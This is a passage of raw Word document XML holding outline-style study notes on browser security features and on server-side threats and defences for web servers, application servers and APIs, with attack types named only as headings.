        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="1AB0777A" w14:textId="77777777" w:rsidR="00497451" w:rsidRDefault="00497451" w:rsidP="00497451">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="18B18CC3" w14:textId="77777777" w:rsidR="00497451" w:rsidRDefault="00497451" w:rsidP="00497451">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="39303F36" w14:textId="77777777" w:rsidR="00497451" w:rsidRPr="00497451" w:rsidRDefault="00497451" w:rsidP="00497451">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00497451">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>6. Phishing &amp; Malware Protection</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0AF5D775" w14:textId="77777777" w:rsidR="00497451" w:rsidRPr="00497451" w:rsidRDefault="00497451" w:rsidP="00497451">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00497451">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Browser Protection Includes</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="14575901" w14:textId="77777777" w:rsidR="00497451" w:rsidRPr="00497451" w:rsidRDefault="00497451" w:rsidP="00497451">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="14"/>
              </w:numPr>
            </w:pPr>
            <w:r w:rsidRPr="00497451">
              <w:t>Google Safe Browsing</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="75FE495C" w14:textId="77777777" w:rsidR="00497451" w:rsidRPr="00497451" w:rsidRDefault="00497451" w:rsidP="00497451">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="14"/>
              </w:numPr>
            </w:pPr>
            <w:r w:rsidRPr="00497451">
              <w:t>Malware site blocklists</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="375151FF" w14:textId="77777777" w:rsidR="00497451" w:rsidRPr="00497451" w:rsidRDefault="00497451" w:rsidP="00497451">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="14"/>
              </w:numPr>
            </w:pPr>
            <w:r w:rsidRPr="00497451">
              <w:t>Download warnings</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="45C37BFA" w14:textId="77777777" w:rsidR="00497451" w:rsidRPr="00497451" w:rsidRDefault="00497451" w:rsidP="00497451">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00497451">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Benefit</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="77780593" w14:textId="77777777" w:rsidR="00497451" w:rsidRPr="00497451" w:rsidRDefault="00497451" w:rsidP="00497451">
            <w:r w:rsidRPr="00497451">
              <w:t xml:space="preserve">Stops users </w:t>
            </w:r>
            <w:r w:rsidRPr="00497451">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>before damage happens</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="527ADDD9" w14:textId="77777777" w:rsidR="00497451" w:rsidRPr="00497451" w:rsidRDefault="00497451" w:rsidP="00497451">
            <w:r w:rsidRPr="00497451">
              <w:pict w14:anchorId="7CF76024">
                <v:rect id="_x0000_i1055" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
              </w:pict>
            </w:r>
          </w:p>
          <w:p w14:paraId="4E9DBB01" w14:textId="77777777" w:rsidR="00497451" w:rsidRPr="00497451" w:rsidRDefault="00497451" w:rsidP="00497451">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00497451">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>7. Third-Party Cookie Blocking</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="141BE1CB" w14:textId="77777777" w:rsidR="00497451" w:rsidRPr="00497451" w:rsidRDefault="00497451" w:rsidP="00497451">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00497451">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Why It Exists</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0CB1E6B7" w14:textId="77777777" w:rsidR="00497451" w:rsidRPr="00497451" w:rsidRDefault="00497451" w:rsidP="00497451">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="15"/>
              </w:numPr>
            </w:pPr>
            <w:r w:rsidRPr="00497451">
              <w:t>Prevents cross-site tracking</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1FECB647" w14:textId="77777777" w:rsidR="00497451" w:rsidRPr="00497451" w:rsidRDefault="00497451" w:rsidP="00497451">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="15"/>
              </w:numPr>
            </w:pPr>
            <w:r w:rsidRPr="00497451">
              <w:t xml:space="preserve">Stops </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00497451">
              <w:t>behavioral</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00497451">
              <w:t xml:space="preserve"> profiling</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="57197352" w14:textId="77777777" w:rsidR="00497451" w:rsidRPr="00497451" w:rsidRDefault="00497451" w:rsidP="00497451">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00497451">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Security Gain</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0669ED1B" w14:textId="77777777" w:rsidR="00497451" w:rsidRPr="00497451" w:rsidRDefault="00497451" w:rsidP="00497451">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="16"/>
              </w:numPr>
            </w:pPr>
            <w:r w:rsidRPr="00497451">
              <w:t>Reduced attack surface</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="28B9CFE5" w14:textId="77777777" w:rsidR="00497451" w:rsidRPr="00497451" w:rsidRDefault="00497451" w:rsidP="00497451">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="16"/>
              </w:numPr>
            </w:pPr>
            <w:r w:rsidRPr="00497451">
              <w:t>Less session correlation risk</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0389CEC1" w14:textId="1CC5F272" w:rsidR="00497451" w:rsidRPr="00497451" w:rsidRDefault="00497451" w:rsidP="00497451"/>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="58CD7E6E" w14:textId="77777777" w:rsidR="00497451" w:rsidRPr="00497451" w:rsidRDefault="00497451" w:rsidP="00497451">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="4C642601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8. Automatic Updates</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3912CEBA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Why They Matter</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="219191A9" w14:textId="77777777" w:rsidR="00497451" w:rsidRPr="00497451" w:rsidRDefault="00497451" w:rsidP="00497451">
      <w:r w:rsidRPr="00497451">
        <w:t xml:space="preserve">Most browser attacks exploit </w:t>
      </w:r>
      <w:r w:rsidRPr="00497451">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>known vulnerabilities</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="688DBCEF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Automatic Updates</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2096140A" w14:textId="77777777" w:rsidR="00497451" w:rsidRPr="00497451" w:rsidRDefault="00497451" w:rsidP="00497451">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="17"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00497451">
        <w:t>Patch zero-days fast</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="388B76BC" w14:textId="77777777" w:rsidR="00497451" w:rsidRPr="00497451" w:rsidRDefault="00497451" w:rsidP="00497451">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="17"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00497451">
        <w:t>Close sandbox escape bugs</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5956DF7D" w14:textId="77777777" w:rsidR="00497451" w:rsidRPr="00497451" w:rsidRDefault="00497451" w:rsidP="00497451">
      <w:r w:rsidRPr="00497451">
        <w:pict w14:anchorId="1337527C">
          <v:rect id="_x0000_i1087" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="74C8AC67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9. Security Warnings</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="518ADE22" w14:textId="77777777" w:rsidR="00497451" w:rsidRPr="00497451" w:rsidRDefault="00497451" w:rsidP="00497451">
      <w:r w:rsidRPr="00497451">
        <w:lastRenderedPageBreak/>
        <w:t>Browsers warn users about:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57789BC9" w14:textId="77777777" w:rsidR="00497451" w:rsidRPr="00497451" w:rsidRDefault="00497451" w:rsidP="00497451">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="18"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00497451">
        <w:t>Invalid SSL certificates</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48FD5B44" w14:textId="77777777" w:rsidR="00497451" w:rsidRPr="00497451" w:rsidRDefault="00497451" w:rsidP="00497451">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="18"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00497451">
        <w:t>Dangerous downloads</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AA31319" w14:textId="77777777" w:rsidR="00497451" w:rsidRPr="00497451" w:rsidRDefault="00497451" w:rsidP="00497451">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="18"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00497451">
        <w:t>Deceptive sites</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04ECCED6" w14:textId="77777777" w:rsidR="00497451" w:rsidRPr="00497451" w:rsidRDefault="00497451" w:rsidP="00497451">
      <w:r w:rsidRPr="00497451">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>These warnings save users who don’t understand security</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BC7948E" w14:textId="77777777" w:rsidR="00497451" w:rsidRPr="00497451" w:rsidRDefault="00497451" w:rsidP="00497451">
      <w:r w:rsidRPr="00497451">
        <w:pict w14:anchorId="16598FC2">
          <v:rect id="_x0000_i1095" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="029AB088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10. Password Managers</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0372F394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Advantages</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BF721A6" w14:textId="77777777" w:rsidR="00497451" w:rsidRPr="00497451" w:rsidRDefault="00497451" w:rsidP="00497451">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="19"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00497451">
        <w:t>Strong passwords</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02D2C693" w14:textId="77777777" w:rsidR="00497451" w:rsidRPr="00497451" w:rsidRDefault="00497451" w:rsidP="00497451">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="19"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00497451">
        <w:t>Auto-fill protection</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B18A188" w14:textId="77777777" w:rsidR="00497451" w:rsidRPr="00497451" w:rsidRDefault="00497451" w:rsidP="00497451">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="19"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00497451">
        <w:t>No reuse</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AF9DE17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Risk</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EC9D054" w14:textId="77777777" w:rsidR="00497451" w:rsidRPr="00497451" w:rsidRDefault="00497451" w:rsidP="00497451">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="20"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00497451">
        <w:t>Device compromise = password exposure</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F49F44B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Best Practice</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="432DA98D" w14:textId="77777777" w:rsidR="00497451" w:rsidRPr="00497451" w:rsidRDefault="00497451" w:rsidP="00497451">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="21"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00497451">
        <w:t>Strong OS lock</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49CE6AED" w14:textId="77777777" w:rsidR="00497451" w:rsidRPr="00497451" w:rsidRDefault="00497451" w:rsidP="00497451">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="21"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00497451">
        <w:t>Use master password or biometric</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17406B96" w14:textId="77777777" w:rsidR="00497451" w:rsidRDefault="00497451"/>
    <w:p w14:paraId="09A9A040" w14:textId="77777777" w:rsidR="00497451" w:rsidRDefault="00497451"/>
    <w:p w14:paraId="7616E94F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SECTION 2: SERVER-SIDE SECURITY</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68017528" w14:textId="77777777" w:rsidR="00497451" w:rsidRPr="00497451" w:rsidRDefault="00497451" w:rsidP="00497451">
      <w:r w:rsidRPr="00497451">
        <w:t>Server-side security protects:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AF86A4F" w14:textId="77777777" w:rsidR="00497451" w:rsidRPr="00497451" w:rsidRDefault="00497451" w:rsidP="00497451">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="22"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00497451">
        <w:t>Business logic</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="471305F5" w14:textId="77777777" w:rsidR="00497451" w:rsidRPr="00497451" w:rsidRDefault="00497451" w:rsidP="00497451">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="22"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00497451">
        <w:t>Databases</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FD856C1" w14:textId="77777777" w:rsidR="00497451" w:rsidRPr="00497451" w:rsidRDefault="00497451" w:rsidP="00497451">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="22"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00497451">
        <w:t>APIs</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69850047" w14:textId="77777777" w:rsidR="00497451" w:rsidRPr="00497451" w:rsidRDefault="00497451" w:rsidP="00497451">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="22"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00497451">
        <w:t>User data</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="759FCFCE" w14:textId="6F870643" w:rsidR="00497451" w:rsidRDefault="00497451">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7BF0A355" wp14:editId="47C8703F">
            <wp:extent cx="2865120" cy="1592580"/>
            <wp:effectExtent l="0" t="0" r="0" b="7620"/>
            <wp:docPr id="1777473895" name="Picture 5" descr="Web Application Architecture: How It Works &amp; Why It Ma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Web Application Architecture: How It Works &amp; Why It Matter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C6E14" w14:textId="77777777" w:rsidR="00497451" w:rsidRDefault="00497451"/>
    <w:p w14:paraId="013AA3EB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lastRenderedPageBreak/>
        <w:t>1. Web Server (Apache / Nginx)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41AF2631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Role</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77590C00" w14:textId="77777777" w:rsidR="00497451" w:rsidRPr="00497451" w:rsidRDefault="00497451" w:rsidP="00497451">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="23"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00497451">
        <w:t>Entry point for HTTP requests</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E2E5E60" w14:textId="77777777" w:rsidR="00497451" w:rsidRPr="00497451" w:rsidRDefault="00497451" w:rsidP="00497451">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="23"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00497451">
        <w:t>Routes traffic to backend services</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43E764D0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Common Attacks</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F135489" w14:textId="77777777" w:rsidR="00497451" w:rsidRPr="00497451" w:rsidRDefault="00497451" w:rsidP="00497451">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="24"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00497451">
        <w:t>DDoS flooding</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="439EBE7F" w14:textId="77777777" w:rsidR="00497451" w:rsidRPr="00497451" w:rsidRDefault="00497451" w:rsidP="00497451">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="24"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00497451">
        <w:t xml:space="preserve">Directory traversal </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00497451">
        <w:t>(../..</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00497451">
        <w:t>/)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BFEE6DA" w14:textId="77777777" w:rsidR="00497451" w:rsidRPr="00497451" w:rsidRDefault="00497451" w:rsidP="00497451">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="24"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00497451">
        <w:t>Server version leakage</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CEB156F" w14:textId="77777777" w:rsidR="00497451" w:rsidRPr="00497451" w:rsidRDefault="00497451" w:rsidP="00497451">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00497451">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Defense</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="21A20DCE" w14:textId="77777777" w:rsidR="00497451" w:rsidRPr="00497451" w:rsidRDefault="00497451" w:rsidP="00497451">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="25"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00497451">
        <w:t>Rate limiting</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60F86071" w14:textId="77777777" w:rsidR="00497451" w:rsidRPr="00497451" w:rsidRDefault="00497451" w:rsidP="00497451">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="25"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00497451">
        <w:t>Disable directory listing</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3398A944" w14:textId="77777777" w:rsidR="00497451" w:rsidRPr="00497451" w:rsidRDefault="00497451" w:rsidP="00497451">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="25"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00497451">
        <w:t>Hide server banners</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02A263DB" w14:textId="77777777" w:rsidR="00497451" w:rsidRPr="00497451" w:rsidRDefault="00497451" w:rsidP="00497451">
      <w:r w:rsidRPr="00497451">
        <w:pict w14:anchorId="6AC2AF58">
          <v:rect id="_x0000_i1150" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="2ADD8D58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2. Application Server</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10843913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Role</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B8E38B0" w14:textId="77777777" w:rsidR="00497451" w:rsidRPr="00497451" w:rsidRDefault="00497451" w:rsidP="00497451">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="26"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00497451">
        <w:t>Handles logic</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A2186E9" w14:textId="77777777" w:rsidR="00497451" w:rsidRPr="00497451" w:rsidRDefault="00497451" w:rsidP="00497451">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="26"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00497451">
        <w:t>Authentication</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="534183B7" w14:textId="77777777" w:rsidR="00497451" w:rsidRPr="00497451" w:rsidRDefault="00497451" w:rsidP="00497451">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="26"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00497451">
        <w:t>Authorization</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1366F2FA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Attacks</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F841F15" w14:textId="77777777" w:rsidR="00497451" w:rsidRPr="00497451" w:rsidRDefault="00497451" w:rsidP="00497451">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="27"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00497451">
        <w:t>SQL Injection</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AA966A9" w14:textId="77777777" w:rsidR="00497451" w:rsidRPr="00497451" w:rsidRDefault="00497451" w:rsidP="00497451">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="27"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00497451">
        <w:t>Command Injection</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FD428F4" w14:textId="77777777" w:rsidR="00497451" w:rsidRPr="00497451" w:rsidRDefault="00497451" w:rsidP="00497451">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="27"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00497451">
        <w:t>Insecure deserialization</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5933DE06" w14:textId="77777777" w:rsidR="00497451" w:rsidRPr="00497451" w:rsidRDefault="00497451" w:rsidP="00497451">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00497451">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Defense</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="35D96DAA" w14:textId="77777777" w:rsidR="00497451" w:rsidRPr="00497451" w:rsidRDefault="00497451" w:rsidP="00497451">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="28"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00497451">
        <w:t>Input validation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7150D24B" w14:textId="77777777" w:rsidR="00497451" w:rsidRPr="00497451" w:rsidRDefault="00497451" w:rsidP="00497451">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="28"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00497451">
        <w:t>Secure frameworks</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44A088A6" w14:textId="77777777" w:rsidR="00497451" w:rsidRPr="00497451" w:rsidRDefault="00497451" w:rsidP="00497451">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="28"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00497451">
        <w:t>Safe object handling</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DA71674" w14:textId="77777777" w:rsidR="00497451" w:rsidRPr="00497451" w:rsidRDefault="00497451" w:rsidP="00497451">
      <w:r w:rsidRPr="00497451">
        <w:pict w14:anchorId="49CDA008">
          <v:rect id="_x0000_i1151" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E154B49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3. APIs</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41F625FB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Role</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B1BEEC5" w14:textId="77777777" w:rsidR="00497451" w:rsidRPr="00497451" w:rsidRDefault="00497451" w:rsidP="00497451">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="29"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00497451">
        <w:t>Connect frontend ↔ backend</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19A3B437" w14:textId="77777777" w:rsidR="00497451" w:rsidRPr="00497451" w:rsidRDefault="00497451" w:rsidP="00497451">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="29"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00497451">
        <w:t>Power mobile &amp; web apps</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="384561BF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lastRenderedPageBreak/>
        <w:t>Attacks</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58C3A5F7" w14:textId="77777777" w:rsidR="00497451" w:rsidRPr="00497451" w:rsidRDefault="00497451" w:rsidP="00497451">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="30"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00497451">
        <w:t>Broken authentication</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64C2DCCE" w14:textId="77777777" w:rsidR="00497451" w:rsidRPr="00497451" w:rsidRDefault="00497451" w:rsidP="00497451">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="30"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00497451">
        <w:t>No rate limits</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="229DB024" w14:textId="77777777" w:rsidR="00497451" w:rsidRPr="00497451" w:rsidRDefault="00497451" w:rsidP="00497451">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="30"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00497451">
        <w:t>Data overexposure</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="167B1EBC" w14:textId="77777777" w:rsidR="00497451" w:rsidRPr="00497451" w:rsidRDefault="00497451" w:rsidP="00497451">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00497451">
        <w:rPr>
          <w:b/>
